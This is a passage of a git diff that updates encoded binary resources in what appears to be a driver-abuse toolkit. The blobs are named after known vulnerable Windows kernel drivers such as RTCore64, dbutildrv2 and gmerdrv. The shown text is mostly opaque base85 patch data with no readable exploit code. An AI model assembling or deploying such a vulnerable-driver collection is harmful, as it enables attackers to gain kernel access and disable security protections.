ULONG SupportedShellFlags; diff --git a/Source/Tanikaze/Tanikaze.vcxproj b/Source/Tanikaze/Tanikaze.vcxproj index be3b446..6c4879b 100644 --- a/Source/Tanikaze/Tanikaze.vcxproj +++ b/Source/Tanikaze/Tanikaze.vcxproj @@ -210,7 +210,10 @@ + + + diff --git a/Source/Tanikaze/Tanikaze.vcxproj.filters b/Source/Tanikaze/Tanikaze.vcxproj.filters index 44683d1..fbebd68 100644 --- a/Source/Tanikaze/Tanikaze.vcxproj.filters +++ b/Source/Tanikaze/Tanikaze.vcxproj.filters @@ -145,6 +145,15 @@ Resource Files + + Resource Files + + + Resource Files + + + Resource Files + diff --git a/Source/Tanikaze/data/KMUEXE.bin b/Source/Tanikaze/data/KMUEXE.bin index 516639501e39d39ac89db604d2b0f3268ec4c692..002c866c1f8c00af927cfae5f0ac42e20408ea42 100644 GIT binary patch delta 24 gcmdmcj&<)jRxbPb{ho&mgqA5uG;(d_Vl++%0DXK2ssI20 delta 24 gcmdmcj&<)jRxbPb{hps5z1Lv(Y~ety4aleEAxC5ee#3jjDL1>XPw delta 18 acmZ3*xQda>ety5_p?7aJ*gYq5EdT&SQwL`N diff --git a/Source/Tanikaze/data/dbutilcat.bin b/Source/Tanikaze/data/dbutilcat.bin index bc5214ff578d57e20cb370856c37bfcb843af272..756ba3b1be6c04ff209c1bc53552444f89aeea9a 100644 GIT binary patch delta 19 acmcbrcU6zeety4aQJ~y1C5eq(-r@jDuLh+6 delta 19 acmcbrcU6zeety5_BIZ{b?4BFByu|@d5(eu4 diff --git a/Source/Tanikaze/data/dbutilinf.bin b/Source/Tanikaze/data/dbutilinf.bin index e407a9a103e0510782ebd152c5c465d56869a43f..f0846c3011d9c5abfd571a064c5667f7c1be79c4 100644 GIT binary patch delta 19 acmX@eevqBZety5FQ>@G~C5eq(+nE7E@djZ4 delta 19 acmX@eevqBZety4alfnxPcF&Dm+nE7IjRwd7 diff --git a/Source/Tanikaze/drv/ALSysIO64.bin b/Source/Tanikaze/drv/ALSysIO64.bin index 18fa28d1124d55d148f72e827f31919541e0c0f6..ff31eb39951de7312310638c01aa2c9ccd6f4792 100644 GIT binary patch delta 21 dcmaF4iSgwoMlSpL{hmQuOv{ucHgd&B0svv?2g(2d delta 21 dcmaF4iSgwoMlSpL{hmQg7d6;DH*&>C0sv##2nhfH diff --git a/Source/Tanikaze/drv/ATSZIO64.bin b/Source/Tanikaze/drv/ATSZIO64.bin index bf09a2f1175d784c5a655c2cd35d46d508ec8df8..02647c54f7437bdcdb5204a88bec82ef03b583b3 100644 GIT binary patch delta 19 bcmewm_#u$Xety5F(as6Wlq5ECJ<|XHS|A8# delta 19 acmewm_#u$Xety4a)4d{fcF&Dm&ols9cL-Gg diff --git a/Source/Tanikaze/drv/AsIO3.bin b/Source/Tanikaze/drv/AsIO3.bin index 795d6837a4fa49ec6effb3c5f5f7d1ceef49249a..dafac1c8cd8ff939107c795a23d3bb86da60f71d 100644 GIT binary patch delta 21 dcmX@QmGS6SMlSpL{hmg delta 21 ccmeykhVkPXMlSpL{hm$!CF<;+8@bZM0A=O~F#rGn diff --git a/Source/Tanikaze/drv/DirectIo64_2.bin b/Source/Tanikaze/drv/DirectIo64_2.bin index a2344e40abb86c54ad9ff306de29c95230b2aa25..778656610d249fcfb39d74cff799c5e369fc185a 100644 GIT binary patch delta 21 dcmX@Ghw;E3MlSpL{hpiVOk1WTv60Ix4ghH|2+jZi delta 21 dcmX@Ghw;E3MlSpL{hmT6In>!bH*%T90RUX@2V?*M diff --git a/Source/Tanikaze/drv/EneIo64.bin b/Source/Tanikaze/drv/EneIo64.bin index 2babeaa1d5d19188728485cc0503984e243040ac..c549b26b6ea9438018904c393884585d26ef32d2 100644 GIT binary patch delta 19 bcmccMe!-o~ety5F5X+inN)j8njwu5GO-ctf delta 19 acmccMe!-o~ety5_COKYpcF&Dm$CLp~RtDz) diff --git a/Source/Tanikaze/drv/EneTechIo64.bin b/Source/Tanikaze/drv/EneTechIo64.bin index f1fa3ed7293e6c72c00bf0f79b37a13ac95fdd92..c7718171ea3f7098c8fc7392208e67db52c35936 100644 GIT binary patch delta 19 bcmcZ~dOwuQety5_BjxqWlq5ECUDW~rTDAyx delta 19 acmcZ~dOwuQety4a6AObnyXQu(t6Bg}K?dLe diff --git a/Source/Tanikaze/drv/GLCKIO2.bin b/Source/Tanikaze/drv/GLCKIO2.bin index c827ed37025e4c35111d662528d6ce8b94530422..9a0c0a9f0cafcb26df1caaf324b50b67623e41a6 100644 GIT binary patch delta 19 acmX>WbS#L=ety4a66?}sN)j8nY%~E+I|ls# delta 19 acmX>WbS#L=ety4a&}BAtcF&DmHktrUy9ToW diff --git a/Source/Tanikaze/drv/HW64.bin b/Source/Tanikaze/drv/HW64.bin index ae1ec94a791b497f98460644363157e41edfb0b0..d14ccd34434f9fb5c832a04fdb229ef4a464c77a 100644 GIT binary patch delta 21 ccmX@v!+5fXk;{I5zvm&gv}H;X8@cS=09|tjy8r+H delta 21 ccmX@v!+5fXk;{I5zvrW@QyT1^8@cS=0Ae@@I{*Lx diff --git a/Source/Tanikaze/drv/MsIo64.bin b/Source/Tanikaze/drv/MsIo64.bin index f6358a83694833254e13f5942ddeb80acd19ac6b..995ce14ea837895e44720dfcf12284e8d840583d 100644 GIT binary patch delta 19 bcmey8`z4plety5_rGkCSlq5ECy)pv;W1R^; delta 19 acmey8`z4plety4ak*B;myXQu(S7rcKUX delta 19 acmdm-vpI*$ety5FQJj!EyXQtOO)~&VZ3Z#` diff --git a/Source/Tanikaze/drv/RTCore64.bin b/Source/Tanikaze/drv/RTCore64.bin index 7c5c57e4140967b7b0775f05ea0bce848f4c6a2c..51417fa3a58ebb00b43da7a99d182e6af056b751 100644 GIT binary patch delta 19 bcmdmLz15n_ety5_p#Yav5_mm8vtwT2_66d delta 21 dcmaDgjq%kqMlSpL{hpT|)vL36Zsbbv1^{X?2-5%n diff --git a/Source/Tanikaze/drv/dbk64.bin b/Source/Tanikaze/drv/dbk64.bin index 8bbd46f3a4beadada05ed6dcb7c56be063a11717..0af932ff1b4a97f69005949960e34c3e420db322 100644 GIT binary patch delta 21 dcmaDlmHFvZW-j~r{hm&Y*~^q9HgerQ1pr_H2&n)7 delta 21 dcmaDlmHFvZW-j~r{hpg{8>+K=ZsfXs3IJyn2~Yq4 diff --git a/Source/Tanikaze/drv/dbutildrv2.bin b/Source/Tanikaze/drv/dbutildrv2.bin index 29af1ab83945d371c70215b2a95f804f2f4e9fcb..d660b74b5d303a02a56e15c98bdb0d02bfb629c4 100644 GIT binary patch delta 19 acmeB4>q+CXpWp8pv@&yq+CXpWp9!$k|Sv-E$)slQ95D;Ra6t diff --git a/Source/Tanikaze/drv/ene2.bin b/Source/Tanikaze/drv/ene2.bin index 308ab192c2b2ca925f001d2c4e7f1d441ff62f9d..9fc6d0f89f397a29c3c8e1ee9a736248db61d466 100644 GIT binary patch delta 19 bcmbOiH7|i`Q;G+r diff --git a/Source/Tanikaze/drv/gmerdrv.bin b/Source/Tanikaze/drv/gmerdrv.bin index bf3934e3896a4b20afa93fffe4956e28741d108a..71019b4bbd46c9027d64fa9582660e94ef81d779 100644 GIT binary patch delta 21 dcmbPxhjH#5MlSpL{hmd7G0T)BHgXB)0RUhZ2h9Kg delta 21 dcmbPxhjH#5MlSpL{hp5wD5B2rK{q diff --git a/Source/Tanikaze/drv/iQVM64.bin b/Source/Tanikaze/drv/iQVM64.bin index 599febf75f35bd4a1b44025c049806b61cf33dce..bf3d7c0d7d1f8b6a0fc9e4d2b4977c4bfec2c949 100644 GIT binary patch delta 21 dcmcc9!g!~Jk;{I5zh~069m|v?HgW|y0RUuD2!a3r delta 21 ccmcc9!g!~Jk;{I5zh{t-ggU$DMy?^{k4^ety5_qZh%;lq5EC#n=J>W6B89 delta 19 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 